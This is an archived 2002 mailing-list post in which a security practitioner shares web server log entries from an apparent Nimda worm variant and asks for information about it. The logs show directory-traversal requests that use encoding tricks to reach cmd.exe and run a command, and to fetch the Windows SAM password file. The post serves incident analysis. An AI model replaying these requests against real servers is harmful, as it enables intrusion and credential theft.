Re: [logs] nimda web server logs

From: Tina Bird (tbird@precision-guesswork.com)
Date: Tue Jun 11 2002 - 13:03:12 PDT

Next message: Marcus J. Ranum: "Re: [logs] Generic Log Message Parsing Tool"

Previous message: Tina Bird: "[logs] nimda web server logs"
Next in thread: Michael Katz: "Re: [logs] nimda web server logs"
Reply: Michael Katz: "Re: [logs] nimda web server logs"
Reply: Sweth Chandramouli: "Re: [logs] nimda web server logs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Here's what I'm seeing -- anyone have any information on this variant?

Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target
IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
\\*.cif/s/b result="500 Server Error"

Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target
IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not
Found"

Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target
IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not
Found"

(IP addresses and other information obscured to protect the innocent.)

thanks for any further info -- tbird


---------------------------------------------------------------------
To unsubscribe, e-mail: loganalysis-unsubscribeat_private
For additional commands, e-mail: loganalysis-helpat_private

Next message: Marcus J. Ranum: "Re: [logs] Generic Log Message Parsing Tool"
Previous message: Tina Bird: "[logs] nimda web server logs"
Next in thread: Michael Katz: "Re: [logs] nimda web server logs"
Reply: Michael Katz: "Re: [logs] nimda web server logs"
Reply: Sweth Chandramouli: "Re: [logs] nimda web server logs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 13:19:35 PDT